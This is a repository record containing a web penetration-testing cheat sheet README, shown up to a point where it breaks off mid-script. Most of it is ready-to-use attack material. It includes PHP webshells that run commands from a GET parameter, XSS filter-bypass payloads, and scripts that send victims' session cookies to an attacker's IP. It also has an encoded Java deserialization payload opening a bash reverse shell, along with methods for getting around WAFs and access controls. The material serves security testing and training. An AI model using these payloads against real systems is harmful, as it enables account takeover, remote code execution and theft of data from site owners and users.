{"id":22927856,"url":"https://github.com/rodolfomarianocy/Tricks-Web-Pentest","last_synced_at":"2026-01-19T16:33:55.099Z","repository":{"id":41219186,"uuid":"490417429","full_name":"rodolfomarianocy/Tricks-Web-Penetration-Tester","owner":"rodolfomarianocy","description":"Web Application Penetration Testing","archived":false,"fork":false,"pushed_at":"2025-02-18T03:43:48.000Z","size":1269,"stargazers_count":107,"open_issues_count":0,"forks_count":27,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-03-30T00:08:46.934Z","etag":null,"topics":["attack","exploitation","hacking","penetration-testing","pentest","pentest-web","pentesting","tips","tricks","vulnerabilities","vulnerability","web"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rodolfomarianocy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-05-09T19:26:32.000Z","updated_at":"2025-03-24T17:07:16.000Z","dependencies_parsed_at":"2023-01-28T13:17:57.094Z","dependency_job_id":"f627102d-a214-464e-8103-0e7eeaa4576b","html_url":"https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Web-Penetration-Tester","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Web-Penetration-Tester/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Web-Penetration-Tester/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rodolfomarianocy%2FTricks-Web-Penetration-Tester/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rodolfomarianocy","download_url":"https://codeload.github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247419860,"owners_count":20936012,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["attack","exploitation","hacking","penetration-testing","pentest","pentest-web","pentesting","tips","tricks","vulnerabilities","vulnerability","web"],"created_at":"2024-12-14T09:16:35.279Z","updated_at":"2026-01-19T16:33:55.085Z","avatar_url":"https://github.com/rodolfomarianocy.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"\u003ch1 align=\"center\"\u003eTricks - Web Penetration Tester\u003c/h1\u003e  \n\u003cp align=\"center\"\u003e\n\t\u003cimg height=500 src=\"https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/assets/54555784/fa9f6972-3251-4744-9058-88f45b89cd07\" /\u003e\n\u003c/p\u003e\n\u003ch2 align=\"center\"\u003e [x] In construction...\u003c/h2\u003e\n\n## Topics\n- [WAF Detection](#waf-detection)\n- [Host Obfuscation](#host-obfuscation)\n- [PHP Obfuscation Techniques](#php-obfuscation-techniques)\n- [PHP Alternatives - disable_functions](#php-alternatives---disable_functions)\n- [Cross-Site Scripting](#cross-site-scripting)\n- [Git Exposed](#git-exposed)\n- [Broken Access Control](#broken-access-control)\n- [Type Juggling and Hash Collision](#type-juggling-and-hash-collision)\n- [Insecure Deserialization](#insecure-deserialization)\n- [LDAP Web Exploitation](#ldap-web-exploitation)\n- [Hash Length Extension Attack](#hash-length-extension-attack)\n- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)\n- [Remote File Inclusion (RFI)](#remote-file-inclusion-rfi)\n- [Path Normalization](#path-normalization)\n- [Unrestricted File Upload Bypass](#unrestricted-file-upload-bypass)\n- [SQL Injection (SQLI)](#waf-detection)\n- [NoSQL Injection (NoSQLI)](#nosql-injection-nosqli)\n- [Cross-Site Request Forgery (CSRF)](#cross-site-request-forgery-csrf)\n- [ClickJacking](#clickjacking)\n- [Host Header Injection](#host-header-injection)\n- [HTTP Request Smuggling](#http-request-smuggling)\n- [Open Redirect](#open-redirect)\n- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)\n- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)\n- [Null Origin Exploitation](#null-origin-exploitation)\n- [CRLF Injection (CRLFI)](#crlf-injection-crlfi)\n- [XML External Entity (XXE)](#xml-external-entity-xxe)\n- [XSLT Server Side Injection](#xslt-server-side-injection)\n- [Prototype Pollution](#prototype-pollution)\n- [Remote Code Execution (RCE)](#remote-code-execution-rce)\n- [API Exploitation](#api-exploitation)\n- [JWT Attacks](#jwt-attacks)\n- [Attacking OAuth](#attacking-oauth)\n- [Padding Oracle Attack](#padding-oracle-attack)\n- [Race Condition](#race-condition)\n- [Content Management System (CMS)](#content-management-system-cms)\n- [Third-party Software: ITSM, ITSO, ITBM](#third-party-software-itsm-itso-itbm)\n- [Some payloads for webshells and revshells](#some-payloads-for-webshells-and-revshells)\n- [Recon (+)](#recon-)\n- [Certifications (+)](#certifications-)\n\n## WAF Detection\n### What WAF does the application have?\n\u003cimg class=\"center\" height=\"450em\" src=\"https://user-images.githubusercontent.com/54555784/188950014-db9eae26-8801-4f68-a673-01f0d7af5c15.png\" /\u003e\n\n### Tools - WAF Detection\nOne of the first steps during reconnaissance is to discover the security controls that exist in the application. Knowing whether there is a WAF filtering and blocking is important to try to bypass it and be effective in your attacks. Here are some tools that help in the possible detection of a WAF:  \n\n-\u003e wafw00f  \nhttps://github.com/EnableSecurity/wafw00ff\n\n-\u003e nmap \u003cip\u003e --script=http-waf-fingerprint  \nhttps://nmap.org/nsedoc/scripts/http-waf-fingerprint.html\n\n-\u003e imperva-detect  \nhttps://raw.githubusercontent.com/vmfae-iscteiulpt/imperva-detect/master/imperva-detect.sh\n\n## WAF bypass\n### Finding the direct IP address of a server\nBypassing a Web Application Firewall (WAF) is a technique often used to carry out direct attacks on the origin server, bypassing the security measures implemented by the WAF. One of the most common initial steps is to identify the direct IP address of the server hosting the application and include it in the /etc/hosts file, associating it with the application domain. In this way, the WAF is bypassed, allowing direct communication with the backend server.\n\nThis type of bypass is only viable when there is no restriction on origin traffic, that is, when the backend server is not configured to accept connections exclusively through the WAF.\n\nYou can try to find out the IP of the backend server using the following tools:\n#### DNS History - Identify histories of previous DNS resolutions or services associated with the domain.\n\n-\u003e censys  \nhttps://search.censys.io/search?resource=hosts\u0026sort=RELEVANCE\u0026per_page=25\u0026virtual_hosts=EXCLUDE\u0026q=example.com\n\n-\u003e virustotal  \nhttps://www.virustotal.com/gui/domain/example.com/relations\n\n-\u003e shodan  \nhttps://www.shodan.io/search?query=example.com\n\n-\u003e IP History  \nhttps://www.iphistory.ch/en/  \n\n-\u003e CloudFlair - Find the origin server IP of websites protected by CloudFlare WAF\n```bash\npython cloudflair.py example.com\n```\nhttps://github.com/christophetd/CloudFlair \n\n-\u003e CrimeFlare - Find the origin server IP of websites protected by CloudFlare WAF\n```bash\n./crimeflare.php example.com\n```\nhttps://github.com/zidansec/CloudPeler  \n\n-\u003e CloudFail - Find the origin server IP of websites protected by CloudFlare WAF\n```bash\npython3 cloudfail.py --target example.com\n```\nhttps://github.com/m0rtem/CloudFail\n\n-\u003e bypass-firewalls-by-DNS-history.sh\n```bash\nbash bypass-firewalls-by-DNS-history.sh -d example.com\n```\nhttps://github.com/vincentcox/bypass-firewalls-by-DNS-history\n\n-\u003e Discover CloudFlare WordPress IP  \nhttps://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/\n\n-\u003e Reverse DNS lookup: It may also be useful to check DNS records to identify subdomains or services associated with the server's real IP. Techniques such as Zone Transfer (when misconfigured) can expose sensitive addresses (tools like nslookup, dig and host can be useful)\n\n### Bypass using cipher not supported by WAF\nThis bypass consists of finding SSL/TLS ciphers that the WAF cannot decrypt and that the server can decrypt, thus inhibiting the action of the WAF.\n```bash\npython abuse-ssl-bypass-waf.py -thread 4 -target \u003ctarget\u003e  \ncurl --ciphers \u003ccipher\u003e -G \u003ctarget\u003e -d \u003cpayload\u003e\n```\nhttps://github.com/LandGrey/abuse-ssl-bypass-waf  \n\n-\u003e Other Doc    \nhttps://github.com/0xInfection/Awesome-WAF\n\n## Host Obfuscation\nThe host obfuscation technique involves changing the host to another format, such as Integer, Octadecimal, and Hexadecimal. This technique can be useful in several scenarios, such as to bypass \"mitigations\" based on host blacklists.\n\n\u003cimg height=\"400em\" src=\"https://user-images.githubusercontent.com/54555784/188947375-6cb16b30-369c-4831-b783-47565623827b.png\" /\u003e\n\ne.g. (127.0.0.1)  \n-\u003e Octal  \n0177.0000.0000.0001  \n-\u003e Hex  \n0x7F000001  \n-\u003e Integer  \n2130706433  \n-\u003e Hybrid  \n0177.0.0x00.0001  \n\n-\u003e Online tool    \nhttps://www.silisoftware.com/tools/ipconverter.php\n\n## PHP Obfuscation Techniques\nObfuscation techniques in PHP consist of making PHP code less readable/understandable, which can help evade signature-based controls and, in some cases, even be useful for bypassing the detection of malicious files by poorly configured EDR solutions.\n\n### Mix - Hex + Octal\n```php\necho \"T\\x72\\x69\\143\\153s\";#Tricks\n```\n\n### Variable Parsing\n```php\n$a = \"ri\"; $b =\"ck\"; echo \"T$a[0]$a[1]$b[0]$b[1]s\";#Tricks\n```\n\n### Variable Variables\n```php\n$a = \"T\"; $$a = \"ri\"; $$$a = \"cks\"; echo $a.$T.$ri;#Tricks\n```\n\n### PHP Non-Alphanumeric \n```php\n$\\_=\"{\"; #XOR char\n```  \n```php\necho $\\_=($\\_^\"\u003c\").($\\_^\"\u003e\").($\\_^\"/\"); #XOR = GET\n```  \nhttps://web.archive.org/web/20160516145602/http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/\n\n### PHP Obfuscator\n-\u003e base64+gzdeflate  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/obfuscation/obfuscation.php\n\n### Online PHP Executor\n\"3v4l.org (leetspeak for eval) is an online shell that allows you to run your code on my server. I compiled more than 250 different PHP versions (every version released since 4.3.0) for you to run online.\"  \nhttps://3v4l.org/  \n\n### PHP Deobfuscation - Decoders \nhttps://malwaredecoder.com/  \n\n## PHP Alternatives - disable_functions\nSome PHP applications use the direct disable_functions option, which can be used to disable functions configured in the php.ini file. In this scenario, trying to carry out malicious actions with different functions can be of great value. Below are some of the functions that can be used:\n\n### Functions\n\n-\u003e shell_exec  \n```php\n\u003c?php echo shell_exec($_GET['ok']);?\u003e\n```\n\n-\u003e system  \n```php\n\u003c?php system($_GET['ok']);?\u003e  \n```\n\n-\u003e exec  \n```php\n\u003c?php echo exec($_GET['ok']);?\u003e  \n```\n\n-\u003e scandir  \n```php\n\u003c?php foreach(scandir($_GET['ok']) as $dir){echo \"\u003cbr\u003e\";echo $dir;};?\u003e\n```\n\n-\u003e file_get_contents  \n```php\n\u003c?php file_get_contents($_GET['ok']);?\u003e\n```\n\n## Cross-Site Scripting\n1-\u003e Identify the language and frameworks used  \n2-\u003e Identify entry points (parameters, inputs, responses reflecting values you can control, etc)   \n3-\u003e Check how this is reflected in the response via source code preview or browser developer tools  \n4-\u003e Check the allowed special characters  \n```\n\u003c \u003e ' \" { } ;\n```\n5-\u003e Detect if there are filters or blockages and modify as needed to make it work\n\n### Cross-Site Scripting Reflected Examples\nThe following are some examples of Reflected XSS, where malicious code is injected through URL parameters or forms and reflected directly in the server response, immediately executing in the browser when the page is loaded.\n#### HTML Tag\n```html\n\u003cdiv\u003ehere\u003c/div\u003e\n```\n-\u003e payload is injected directly into an HTML tag \n```html\n\u003csvg/onload=alert(1)\n```\n\n#### HTML  Attributes\n```html\n\u003cinput value=\"here\"/\u003e\u003c/input\u003e\n```\n \n-\u003e payload is injected inside HTML attributes\n```js\n\" /\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\n```\n  \n#### Script Tag\n```js\n\u003cscript\u003e\n    var name=\"here\";\n\u003c/script\u003e\n```\n  \n-\u003e payload is injected within a JavaScript code context\n```js\n\";alert(1);//\n```\n\n#### Event Attributes\n```html\n\u003cbutton onclick=\"here;\"\u003eOkay!\u003c/button\u003e\n```\n\n-\u003e payload is injected inside attributes like onclick, onmouseover etc.\n```js\nalert(1)\n```\n\n#### Dom Based\nBelow are some examples of DOM-based XSS, where malicious code is dynamically manipulated on the client side via JavaScript, interacting with the DOM (Document Object Model), which represents the structure of the web page.\n##### Injection via location.search and innerHTML\n```js\n\u003cscript\u003evar q = location.search.replace(\"?q=\", \"\");domE1.innerHTML = \"\u003ca href=\\'\"+q+\"\\'\u003eClick here\u003c/a\u003e\";\u003c/script\u003e\n```\n\n-\u003e Payload\n```js\n?q=javascript:alert(1)\n```\n\n##### Injection via document.write\n```js\n\u003cscript\u003e\n  var q = new URLSearchParams(location.search).get(\"q\");\n  document.write(\"\u003cdiv\u003e\" + q + \"\u003c/div\u003e\");\n\u003c/script\u003e\n```\n\n-\u003e Payload\n```js\n?q=\u003cimg src=x onerror=alert(1)\u003e\n```\n\n##### Injection via location.hash and innerHTML\n```js\n\u003cscript\u003e\n  var hash = location.hash.substring(1);\n  document.getElementById(\"content\").innerHTML = hash;\n\u003c/script\u003e\n```\n\n-\u003e Payload\n```js\n#\u003csvg/onload=alert(1)\u003e\n```\n\n#### Injection via setAttribute\n```js\n\u003cscript\u003e\n  var user = location.search.split(\"=\")[1];\n  document.getElementById(\"link\").setAttribute(\"href\", user);\n\u003c/script\u003e\n```\n\n-\u003e Payload\n```js\n?user=javascript:alert(1)\n```\n\n### XSS Auditor, XSS Filter, X-XSS-Protection and Content-Security-Policy\nXSS Auditor and XSS Filter were security mechanisms implemented in Google Chrome, Internet Explorer, and of Microsoft Edge to mitigate Cross-Site Scripting (XSS) attacks. The XSS Auditor, present in Chrome until its discontinuation, analyzed the content reflected in HTTP responses and blocked potentially malicious snippets of code before they were executed. The XSS Filter, used in Internet Explorer, inspected the DOM and input data for typical XSS patterns. Both were useful initially, but had limitations and could be worked around, as well as causing false positives. The X-XSS-Protection header allowed controlling these protections, activating or deactivating the mechanism according to the server configuration. Microsoft Edge also supported this feature in its earlier versions, but it was eventually removed in favor of more robust security mechanisms. Currently, these filters are only relevant for older browsers, such as Internet Explorer, older versions of Chrome, and legacy versions of Microsoft Edge, as modern browsers no longer use these technologies. \n\nToday, with the obsolescence of these mechanisms, secure coding practices are adopted, such as input validation and sanitization, output encoding, and the use of the Content-Security-Policy (CSP) security header.\n\n-\u003e References  \nhttps://www.chromium.org/developers/design-documents/xss-auditor/  \nhttps://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/X-XSS-Protection  \nhttps://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge  \n\n### Bypassing a Content-Security-Policy (CSP)\n-\u003e Useful Links  \nhttps://www.vaadata.com/blog/content-security-policy-bypass-techniques-and-security-best-practices/  \nhttps://www.cobalt.io/blog/csp-and-bypasses  \nhttps://portswigger.net/research/using-form-hijacking-to-bypass-csp\n\n### Obfuscation with Execution Sinks for Bypass\n#### Eval \n-\u003e Execute JS code contained in a string directly  \n\n#### setInterval\n-\u003e Executes JS code contained in a string repeatedly after an interval.  \n-\u003e e.g. setInterval(\"alert('xss')\", 1000);  \n-\u003e If the delay argument is omitted, it will be treated as undefined and the browser will use a minimum delay (~4ms to 10ms)\n\n#### setTimeout \n-\u003e Executes JS code contained in a string once after a delay.  \n-\u003e e.g. setTimeout(\"alert('xss')\", 1000);  \n-\u003e If the delay argument is omitted, it will be treated as undefined and the browser will use a minimum delay (~4ms to 10ms)\n\n#### Examples of using execution sinks with obfuscation\n-\u003e eval + octal  \n```html\n\u003cimg src=x onerror=\"eval('\\141lert(1)')\"/\u003e\n```\n\n-\u003e setInterval + hexadecimal  \n```html\n\u003cimg src=x onerror=\"setInterval('\\x61lert(1)')\"/\u003e\n```\n\n-\u003e setTimeout + hex + octal  \n```html\n\u003cimg src=x onerror=\"setTimeout('\\x61\\154\\145\\x72\\164\\x28\\x31\\x29')\"/\u003e\n```\n\n### Other bypass techniques\n-\u003e unicode  \n```html\n\u003cimg src=x onerror=\"\\u0061\\u006c\\u0065\\u0072\\u0074(1)\"/\u003e\n```\n\n### Converters - octal, hexadecimal, unicode\n- http://www.unit-conversion.info/texttools/octal/  \n- http://www.unit-conversion.info/texttools/hexadecimal/\n- https://checkserp.com/encode/unicode/  \n\n### Regex Blacklist Filtering\nSometimes you can find a filter being applied as sanitization to mitigate Cross-Site Scripting (XSS), in this case there are ways to bypass this protection:  \n-\u003e Filter blocking \"on\" - Bypass  \n`(on\\w+\\s*=)`  \n```html\n\u003csvg onload%09=alert(1)\u003e \n\u003csvg %09onload%20=alert(1)\u003e\n\u003csvg onload%09%20%28%2C%3B=alert(1)\u003e\n\u003csvg onload%0B=alert(1)\u003e\n```  \n\n### Keyword Based in Filter\n#### \"alert\" blocked - Bypass\n```js\n\u003cscript\u003e\\u0061lert(1)\u003c/script\u003e\n\u003cscript\u003e\\u0061\\u006C\\u0065\\u0072\\u0074(1)\u003c/script\u003e\n\u003cscript\u003eeval(\"\\u0061lert(1)\")\u003c/script\u003e  \n\u003cscript\u003eeval(\"\\u0061\\u006C\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\")\u003c/script\u003e\n```\n\n#### Removing \"script\" Tag - Bypass\n```js\n\u003csCR\u003cscript\u003eiPt\u003ealert(1)\u003c/SCr\u003c/script\u003eIPt\u003e\n```\n\n### Scaping Quote - Bypass\n#### Methods\n-\u003e String.fromCharCode()\n```js\neval(String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41))\n```\n\n-\u003e unescape  \n```js\neval(unescape(\"%61%6c%65%72%74%28%27%58%53%53%27%29\"))\n```\n\n-\u003e decodeURI\n```js\neval(decodeURI(/alert(%22xss%22)/.source))\neval(decodeURIComponent(/alert(%22xss%22)/.source))\n```\n\n### Cheat Sheets\nhttps://portswigger.net/web-security/cross-site-scripting/cheat-sheet  \nhttps://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html  \n\n### XSS Keylogger\nThe XSS keylogger is a malicious script that can be injected into applications vulnerable to Cross-Site Scripting (XSS), with the aim of capturing victims' keystrokes. By intercepting keyboard events in the browser, the attacker can record passwords, messages and other sensitive data.\n-\u003e Useful Links  \nhttps://rapid7.com/blog/post/2012/02/21/metasploit-javascript-keylogger/  \nhttps://github.com/hadynz/xss-keylogger\n\n### XSS Mutation\nXSS Mutation is an exploitation method for the Cross-Site Scripting vulnerability that exploits the process of \"cleaning\" and interpreting HTML by the browser. Even after content is filtered by mechanisms like DOMPurify, it can undergo internal mutations that reactivate malicious payloads. This attack is particularly effective against filters based solely on input analysis, without considering browser behavior.  \n-\u003e Useful Links  \nhttps://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss  \nhttp://www.businessinfo.co.uk/labs/mxss/\n\n### XSS Polyglot\nA polyglot XSS is a malicious payload constructed to function in multiple execution contexts simultaneously. This technique allows for filter evasion and consistent payload execution across multiple scenarios, making it a good choice for discovering and exploiting XSS vulnerabilities, as demonstrated in real-world attacks on large platforms.  \n-\u003e Useful Links  \nhttps://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot  \nhttps://portswigger.net/research/finding-dom-polyglot-xss-in-paypal-the-easy-way\n\n### Bypass Wordlists for XSS\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/xss_bypass.txt  \nhttps://gist.githubusercontent.com/rvrsh3ll/09a8b933291f9f98e8ec/raw/535cd1a9cefb221dd9de6965e87ca8a9eb5dc320/xxsfilterbypass.lst  \nhttps://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt  \nhttps://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt  \n\n### JavaScript Encoding\n-\u003e jjencode  \nhttps://utf-8.jp/public/jjencode.html   \n-\u003e aaencode  \nhttps://utf-8.jp/public/aaencode.html  \n-\u003e jsfuck  \nhttp://www.jsfuck.com/  \n-\u003e Xchars.js  \nhttps://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html  \n\n### Deobfuscation Javascript and PHP - Decoder\nhttps://malwaredecoder.com/  \n\n### XSS to LFI\n```html\n\u003cimg src=x onerror=\"document.write('\u003ciframe src=file:///etc/passwd\u003e\u003c/iframe\u003e')\"/\u003e\n```\n\n```js\n\u003cscript\u003edocument.write('\u003ciframe src=file:///etc/passwd\u003e\u003c/iframe\u003e');\u003c/script\u003e\n```\n\n### XSS - Session Hijacking\n-\u003e After finding an application vulnerable to an XSS (Cross-Site Scripting) attack, one of the vectors that can be used is session hijacking, allowing an attacker to inject malicious code into a web page, which will be executed in the victim's browser. This code can steal session cookies with the \"document.cookie\" property, and send them to the server controlled by the attacker, allowing unauthorized access to the victim's account.\n\n1- Start a web server  \n```\nsudo service apache2 start\n```\n2- Tunnel with ngrok on the same port as your web server  \n```\nngrok http 80\n```\n\n3- Observe web server logs in real time  \n```\ntail -f /var/log/apache2/access.log\n```\n\n4- Execute the payload, below are some options:\n```js\n\u003cscript\u003enew Image().src=\"http://\u003cIP\u003e/ok.jpg?output=\"+document.cookie;\u003c/script\u003e\n\u003cscript type=\"text/javascript\"\u003edocument.location=\"http://\u003cIP\u003e/?cookie=\"+document.cookie;\u003c/script\u003e  \n\u003cscript\u003ewindow.location=\"http://\u003cIP\u003e/?cookie=\"+document.cookie;\u003c/script\u003e\n\u003cscript\u003edocument.location=\"http://\u003cIP\u003e/?cookie=\"+document.cookie;\u003c/script\u003e  \n\u003cscript\u003efetch('http://\u003cIP\u003e/?cookie=' + btoa(document.cookie));\u003c/script\u003e  \n```\n\n5- Check the cookies received in the web server logs (it is important first of all to analyze the application and understand its session management and understand whether the cookie received is a session cookie).  \n* If cookies have the \"HttpOnly\" security attribute, you will not be able to obtain them through XSS.\n\n### XSS Tools\n-\u003e dalfox  \n```bash\ndalfox url http://example.com\n```\nhttps://github.com/hahwul/dalfox\n\n-\u003e gxss  \n```bash\necho \"https://target.com/some.php?first=hello\u0026last=world\" | Gxss -c 100\n```\nhttps://github.com/KathanP19/Gxss\n\n### XSS Templates - Nuclei\nhttps://raw.githubusercontent.com/esetal/nuclei-bb-templates/master/xss-fuzz.yaml\n\n## Git Exposed\nGit exposed occurs when the .git directory of a Git repository becomes publicly accessible on web servers, allowing an attacker to download the entire project history, including sensitive files, credentials, source code, and information that should be restricted, which can lead to the exposure of critical data and facilitate other chain attacks.\n\n### git-dumper\n```bash\ngit-dumper http://site.com/.git .\n```\nhttps://github.com/arthaud/git-dumper\n\n### GitTools\nhttps://github.com/internetwache/GitTools\n\n## Broken Access Control\n### IDOR (Insecure Direct Object References)\n1. Search for IDs (or any direct reference to an object) in routes and parameters of a request, to try to obtain data from other users\n2. In many cases you will want to have two accounts to cross-test  \n4. In some specific cases changing the request method (GET, POST, PUT, DELETE, PATCH…) may help  \n4. Sometimes an IDOR may exist in old versions of an API that are still active (/api/v1/ /api/v2/ /api/v3/), the fuzzing process can help with this  \n5. Performing a brute force attack can be useful depending on the context and predictability\n\t\n#### IDOR + Parameter Pollution\n##### HTTP Parameter Pollution\n```HTTP\nGET /api/v1/messages?id=\u003canother_user_ID\u003e #unauthourized\nGET /api/v1/messages?id=\u003cyou_User_ID\u003e\u0026id=\u003canother_user_ID\u003e #authorized\n```\nor\n```\nGET /api/v1/messages?id[]=\u003cyour_user_ID\u003e\u0026id[]=\u003canother_user_ID\u003e #authorized\n```\n\n##### Json Parameter Pollution\n```HTTP\nPOST /api/v1/messages\n{\"user_id\":\u003cYou_user_id\u003e,\"user_id\":\u003cAnoher_User_id\u003e} \n```\n\n-\u003e with a JSON Object\n```HTTP\nPOST /api/v1/messages\n{\"user_id\":{\"user_id\":\u003cAnoher_User_id\u003e}} \n```\n\n#### Authorization Bypass\n-\u003e with array  \n```HTTP\n{\"user_id\":001} #Unauthorized\n{\"user_id\":[001]} #Authorized\n```\n\n-\u003e add .json if in ruby\n```HTTP\nGET /user/1029 #Unauthorized\nGET /user/1029.json #Authorized\n```\n\n-\u003e Random Case\n```HTTP\nGET /admin/profile #Unauthorized\nGET /ADMIN/profile #Authorized\n```\n\n-\u003e 403 Bypass \n```HTTP\n./dontgo403 -u http://site.com/admin\n```\nhttps://github.com/devploit/dontgo403\n\n#### UUIDv1\nhttps://caon.io/exploitation/vulnerability/other/uuid/\nhttps://github.com/felipecaon/uuidv1gen\n\n### Spoofing Internal IP in Request Header\n```\nX-Originating-IP: 127.0.0.1\nX-Forwarded-For: 127.0.0.1\nForwarded-For: 127.0.0.1\nForwarded-For-Ip: 127.0.0.1\nX-Forwarded-Host: 127.0.0.1\nX-Remote-IP: 127.0.0.1\nX-Remote-Addr: 127.0.0.1\nX-Client-IP: 127.0.0.1\nClient-IP: 127.0.0.1\nTrue-Client-IP: 127.0.0.1\nX-Custom-IP-Authorization: 127.0.0.1\n```\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/headers_internal_bypass.txt\n\n## Type Juggling and Hash Collision\nhttps://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf  \nhttps://github.com/JohnHammond/ctf-katana#php\n\n## Insecure Deserialization \n-\u003e Binary (Java, C++, etc ...)  \n-\u003e Human-Readable (XML, JSON, SOAP, YAML, PHP)\n\n### PHP Deserialization\n#### PHP - Method Serialization:\n-\u003e serialize()  \n-\u003e unserialize()  \n\n#### Magic Methods:\n-\u003e __construct()  \n-\u003e __destruct()  \n-\u003e __wakeup()  \n\n#### Class Properties\n\nExamples:\nPublic \\\u003cs\u003e  \n`O:4:\"Okay\":1:{s:8:\"filepath\";s:11:\"/tmp/ok.txt\";}`\n  \nProtected \\0 * \\0  \n`O:4:\"Okay\":1:{s:11:\"' . \"\\0\" . '*' . \"\\0\" . 'filepath\";s:11:\"/tmp/ok.txt\";}`\n\nPrivate \\0 \\\u003cs\u003e \\0    \n`O:4:\"Okay\":1:{s:14:\"' . \"\\0\" . 'Okay' . \"\\0\" . 'filepath\";s:11:\"/tmp/ok.txt\";}`\n  \nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/php/example.php\n  \n#### Trick Bypass\n\n`a:2:{s:8:\"anything\";o:4:\"Okay\":1:{s:8:\"filepath\";s:11:\"/tmp/ok.txt\";}}`\n\n### Tool\n\nhttps://github.com/ambionics/phpggc\n  \n### Other\n\nhttps://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/php/token_hmac_sha1.php\n\n### .NET Deserialization\n#### Methods Serialization\n\n-\u003e Binary Formatter  \n-\u003e DataContractSerializer  \n-\u003e NetDataContractSerializer  \n-\u003e XML Serialization  \n  \n#### Most common places to find serialized data\n-\u003e VIEWSTATE  \n-\u003e .NET remoting services  \n\n#### Identify\n-\u003e Detect via Response Simple in SOAP Message\n```\nPOST /endpoint HTTP/1.1\nHost: \u003cIP\u003e:\u003cport\u003e\n\n\u003cSOAP:Envelope\u003e\n\u003c/SOAP:Envelope\u003e\n```\n\n```\nysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c \"cmd /c ping \u003cip\u003e\" -o raw  \n```\nhttps://github.com/pwntester/ysoserial.net  \n```\nPOST /endpoint HTTP/1.1\nHost: ip:port\nSOAPAction: something\nContet-Type: text/xml\n\n\u003cpayload_ysoserial_here_without_\u003cSOAP-ENV:Body\u003e\n```\n`tcpdump -i tap0 icmp`\n\n#### Exploitation\n-\u003e Insecure - Machine Key for RCE  \nhttps://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/exploiting-__viewstate-parameter.md  \n\n#### Tools\nhttps://github.com/0xacb/viewgen  \nhttps://github.com/pwntester/ysoserial.net  \nhttps://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper\nhttps://github.com/tyranid/ExploitRemotingService\n\n### Other Docs\nhttps://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net#PoC  \n\n### Java Deserialization\n#### Identify\n-\u003e import java.io.serializable  \n-\u003e binary with ac ed 00 05  \n-\u003e base64 starts with rO0AB in web applications\n  \n#### Java Lang Runtime Exec - java.lang.Runtime.exec()\n  \nbash -c {echo,payload_base64}|{base64,-d}|{bash,-i}  \nhttps://www.bugku.net/runtime-exec-payloads/\n\n`python hackshell.py --payload bash --lhost 192.168.0.20 --lport 443 --type jlre`  \n```\nbash -c {echo,YmEkKClzaCAtJCgpaSAnL2Rldi90Y3AvMTkyLjE2OC4wLjIwLzQ0MyAwPiYxJw==}|{base64,-d}|{bash,-i}\n```\nhttps://github.com/rodolfomarianocy/hackshell\n\n#### Tools\nhttps://github.com/frohoff/ysoserial  \nhttps://github.com/NickstaDB/SerializationDumper  \nhttps://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java\n  \n#### Script\n\n```\nwhile read payload; \ndo echo 